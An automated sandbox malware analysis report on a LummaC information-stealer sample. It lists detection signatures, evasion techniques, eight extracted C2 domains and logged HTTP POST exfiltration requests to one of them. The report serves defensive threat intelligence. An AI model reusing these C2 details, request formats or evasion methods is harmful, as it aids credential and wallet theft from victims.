Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545194
MD5:65af596c495031434154ebb5e6eb462f
SHA1:3173f8c46d141b5df11700b69b64a92fe4f85730
SHA256:e907eb01f5e06ae6692bae8a41628c3e754009316875627b594e090d380488d3
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 65AF596C495031434154EBB5E6EB462F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["thumbystriw.store", "necklacedmny.store", "founpiuer.store", "navygenerayk.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 1408JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: file.exe PID: 1408JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: file.exe PID: 1408JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:11.689997+010020546531A Network Trojan was detected192.168.2.649710188.114.96.3443TCP
              2024-10-30T08:22:12.907514+010020546531A Network Trojan was detected192.168.2.649711188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:11.689997+010020498361A Network Trojan was detected192.168.2.649710188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:12.907514+010020498121A Network Trojan was detected192.168.2.649711188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:11.163524+010020571241Domain Observed Used for C2 Detected192.168.2.649710188.114.96.3443TCP
              2024-10-30T08:22:12.359132+010020571241Domain Observed Used for C2 Detected192.168.2.649711188.114.96.3443TCP
              2024-10-30T08:22:13.763866+010020571241Domain Observed Used for C2 Detected192.168.2.649713188.114.96.3443TCP
              2024-10-30T08:22:14.983235+010020571241Domain Observed Used for C2 Detected192.168.2.649719188.114.96.3443TCP
              2024-10-30T08:22:16.565849+010020571241Domain Observed Used for C2 Detected192.168.2.649725188.114.96.3443TCP
              2024-10-30T08:22:18.379285+010020571241Domain Observed Used for C2 Detected192.168.2.649736188.114.96.3443TCP
              2024-10-30T08:22:20.185206+010020571241Domain Observed Used for C2 Detected192.168.2.649748188.114.96.3443TCP
              2024-10-30T08:22:22.420516+010020571241Domain Observed Used for C2 Detected192.168.2.649764188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:10.469901+010020571291Domain Observed Used for C2 Detected192.168.2.6627081.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:10.481879+010020571271Domain Observed Used for C2 Detected192.168.2.6605051.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:10.514628+010020571231Domain Observed Used for C2 Detected192.168.2.6607301.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:10.450006+010020571311Domain Observed Used for C2 Detected192.168.2.6627441.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:10.496016+010020571251Domain Observed Used for C2 Detected192.168.2.6543471.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T08:22:14.287670+010020480941Malware Command and Control Activity Detected192.168.2.649713188.114.96.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.1408.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "necklacedmny.store", "founpiuer.store", "navygenerayk.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 36%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:62744 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:54347 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:62708 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:60505 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49719 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49725 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49764 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:60730 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49736 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49748 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49713 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.96.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19968Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1222Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571731Host: necklacedmny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
              Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
              Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2198903513.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
              Source: file.exe, 00000000.00000002.2294200437.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/H
              Source: file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/X
              Source: file.exe, 00000000.00000003.2226542489.00000000058ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
              Source: file.exe, 00000000.00000003.2211518965.00000000058F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiC
              Source: file.exe, 00000000.00000003.2211518965.00000000058F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiS
              Source: file.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270741632.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2288823700.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apip
              Source: file.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
              Source: file.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api.default-release/key4.dbPK
              Source: file.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/apiK
              Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2228046825.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: file.exe, 00000000.00000003.2228046825.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
